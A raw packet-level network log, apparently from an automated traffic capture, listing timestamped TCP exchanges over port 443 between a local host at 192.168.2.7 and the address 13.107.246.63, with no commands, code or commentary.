                                                                                                          Nov 22, 2024 15:48:30.464365005 CET49728443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.464370012 CET4434972813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.474381924 CET4434972713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.474771976 CET49727443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.474783897 CET4434972713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.475292921 CET49727443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.475296021 CET4434972713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.528676033 CET4434972413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.528748035 CET4434972413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.528834105 CET49724443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.529042006 CET49724443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.529077053 CET4434972413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.529095888 CET49724443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.529102087 CET4434972413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.532172918 CET49729443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.532216072 CET4434972913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.532303095 CET49729443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.532475948 CET49729443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.532488108 CET4434972913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.593667984 CET4434972613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.593730927 CET4434972613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.593977928 CET49726443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.594212055 CET49726443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.594232082 CET4434972613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.594242096 CET49726443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.594247103 CET4434972613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.597436905 CET49730443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.597489119 CET4434973013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.597605944 CET49730443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.597771883 CET49730443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.597789049 CET4434973013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.598022938 CET4434972513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.598087072 CET4434972513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.598129034 CET49725443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.598254919 CET49725443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.598263979 CET4434972513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.598299026 CET49725443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.598303080 CET4434972513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.600636959 CET49731443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.600660086 CET4434973113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.600738049 CET49731443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.600882053 CET49731443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.600897074 CET4434973113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.911488056 CET4434972813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.911561012 CET4434972813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.911626101 CET49728443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.912478924 CET49728443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.912525892 CET4434972813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.912556887 CET49728443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.912573099 CET4434972813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.915803909 CET49732443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.915899038 CET4434973213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.915987968 CET49732443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.916172028 CET49732443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.916202068 CET4434973213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.921936035 CET4434972713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.922000885 CET4434972713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.922257900 CET49727443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.922560930 CET49727443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.922574043 CET4434972713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.922617912 CET49727443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.922629118 CET4434972713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.926553965 CET49733443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.926647902 CET4434973313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:30.926748037 CET49733443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.926964045 CET49733443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:30.926997900 CET4434973313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.313604116 CET4434972913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.314238071 CET49729443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.314271927 CET4434972913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.314750910 CET49729443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.314757109 CET4434972913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.319171906 CET4434973013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.319272995 CET4434973113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.319494963 CET49730443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.319571018 CET4434973013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.319648027 CET49731443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.319654942 CET4434973113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.319928885 CET49730443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.319942951 CET4434973013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.320038080 CET49731443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.320043087 CET4434973113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.676009893 CET4434973313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.677150011 CET49733443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.677222967 CET4434973313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.677756071 CET49733443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.677773952 CET4434973313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.680058956 CET4434973213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.680389881 CET49732443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.680418968 CET4434973213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.680865049 CET49732443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.680871010 CET4434973213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.757929087 CET4434973013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.757997036 CET4434973013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.758186102 CET49730443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.758367062 CET49730443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.758414984 CET4434973013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.758444071 CET49730443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.758459091 CET4434973013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.759162903 CET4434973113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.759232998 CET4434973113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.759290934 CET49731443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.759521961 CET49731443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.759537935 CET4434973113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.762041092 CET49736443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.762080908 CET4434973613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.762129068 CET49737443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.762161016 CET4434973713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.762162924 CET49736443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.762226105 CET49737443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.762312889 CET49736443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.762325048 CET4434973613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.762366056 CET49737443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.762381077 CET4434973713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.768836975 CET4434972913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.768893957 CET4434972913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.768958092 CET49729443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.769031048 CET49729443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.769035101 CET4434972913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.769043922 CET49729443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.769051075 CET4434972913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.771033049 CET49738443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.771044016 CET4434973813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:32.771116018 CET49738443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.771245956 CET49738443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:32.771255970 CET4434973813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:33.111118078 CET4434973313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:33.111198902 CET4434973313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:33.111547947 CET49733443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:33.111648083 CET49733443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:33.111648083 CET49733443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:33.111696005 CET4434973313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:33.111723900 CET4434973313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:33.114895105 CET4434973213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:33.115034103 CET49739443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:33.115072966 CET4434973213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:33.115080118 CET4434973913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:33.115154982 CET49732443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:33.115169048 CET49739443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:33.115266085 CET49732443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:33.115266085 CET49732443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:33.115330935 CET4434973213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:33.115346909 CET49739443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:33.115358114 CET4434973213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:33.115361929 CET4434973913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:33.117372990 CET49740443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:33.117417097 CET4434974013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:33.117492914 CET49740443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:33.117628098 CET49740443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:33.117638111 CET4434974013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:34.573424101 CET4434973713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:34.607408047 CET49737443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:34.607431889 CET4434973713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:34.614787102 CET49737443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:34.614792109 CET4434973713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:34.632452011 CET4434973613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:34.632989883 CET49736443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:34.633011103 CET4434973613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:34.633415937 CET49736443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:34.633421898 CET4434973613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:34.640994072 CET4434973813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:34.641282082 CET49738443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:34.641292095 CET4434973813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:34.641602993 CET49738443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:34.641607046 CET4434973813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:34.852400064 CET4434973913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:34.853115082 CET49739443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:34.853142977 CET4434973913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:34.853630066 CET49739443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:34.853634119 CET4434973913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:34.967336893 CET4434974013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:34.973469973 CET49740443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:34.973494053 CET4434974013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:34.973933935 CET49740443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:34.973937988 CET4434974013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.021064997 CET4434973713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.021126032 CET4434973713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.021176100 CET49737443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.021451950 CET49737443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.021451950 CET49737443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.021469116 CET4434973713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.021478891 CET4434973713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.024024010 CET49742443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.024053097 CET4434974213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.024130106 CET49742443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.024265051 CET49742443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.024272919 CET4434974213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.089463949 CET4434973613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.089528084 CET4434973613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.089591026 CET49736443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.089699030 CET49736443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.089715958 CET4434973613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.089726925 CET49736443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.089730978 CET4434973613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.091993093 CET49743443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.092032909 CET4434974313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.092118979 CET49743443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.092242002 CET49743443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.092257977 CET4434974313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.103274107 CET4434973813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.103341103 CET4434973813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.103413105 CET49738443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.103643894 CET49738443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.103643894 CET49738443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.103651047 CET4434973813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.103658915 CET4434973813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.105364084 CET49744443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.105407000 CET4434974413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.105484962 CET49744443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.105581999 CET49744443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.105601072 CET4434974413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.290549994 CET4434973913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.290620089 CET4434973913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.290666103 CET49739443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.290868998 CET49739443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.290903091 CET4434973913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.290915966 CET49739443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.290920973 CET4434973913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.293787003 CET49745443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.293827057 CET4434974513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.293893099 CET49745443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.294028997 CET49745443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.294044971 CET4434974513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.431356907 CET4434974013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.431420088 CET4434974013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.431473970 CET49740443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.432496071 CET49740443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.432513952 CET4434974013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.432523966 CET49740443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.432528973 CET4434974013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.435921907 CET49746443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.435962915 CET4434974613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:35.436084986 CET49746443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.436240911 CET49746443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:35.436254978 CET4434974613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:36.819753885 CET4434974313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:36.820425034 CET49743443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:36.820442915 CET4434974313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:36.820902109 CET49743443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:36.820908070 CET4434974313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:36.826391935 CET4434974213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:36.826647997 CET49742443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:36.826667070 CET4434974213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:36.826975107 CET49742443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:36.826978922 CET4434974213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:36.977935076 CET4434974413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:36.979475975 CET49744443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:36.979500055 CET4434974413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:36.980272055 CET49744443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:36.980278015 CET4434974413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.079284906 CET4434974513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.079767942 CET49745443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.079785109 CET4434974513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.080255032 CET49745443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.080259085 CET4434974513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.154798031 CET4434974613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.155256033 CET49746443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.155275106 CET4434974613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.155746937 CET49746443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.155751944 CET4434974613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.255115032 CET4434974313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.255162001 CET4434974313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.255215883 CET49743443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.255436897 CET49743443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.255454063 CET4434974313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.255475998 CET49743443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.255486965 CET4434974313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.258169889 CET49747443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.258199930 CET4434974713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.258404970 CET49747443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.258544922 CET49747443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.258557081 CET4434974713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.275986910 CET4434974213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.276034117 CET4434974213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.276146889 CET49742443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.276171923 CET49742443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.276185989 CET4434974213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.276195049 CET49742443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.276199102 CET4434974213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.278188944 CET49748443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.278211117 CET4434974813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.278281927 CET49748443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.278392076 CET49748443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.278403997 CET4434974813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.432199955 CET4434974413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.432261944 CET4434974413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.432507038 CET49744443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.432543993 CET49744443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.432559967 CET4434974413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.432573080 CET49744443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.432578087 CET4434974413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.435252905 CET49749443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.435300112 CET4434974913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.435364962 CET49749443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.435498953 CET49749443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.435511112 CET4434974913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.530160904 CET4434974513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.530241966 CET4434974513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.530412912 CET49745443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.530451059 CET49745443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.530451059 CET49745443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.530471087 CET4434974513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.530481100 CET4434974513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.532603979 CET49750443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.532639027 CET4434975013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.532700062 CET49750443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.532855034 CET49750443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.532870054 CET4434975013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.605371952 CET4434974613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.605427027 CET4434974613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.605552912 CET49746443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.605577946 CET49746443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.605587959 CET4434974613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.605598927 CET49746443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.605602980 CET4434974613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.607631922 CET49751443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.607666969 CET4434975113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:37.607731104 CET49751443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.607868910 CET49751443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:48:37.607877016 CET4434975113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:39.042342901 CET4434974813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:48:39.055150032 CET49748443192.168.2.713.107.246.63
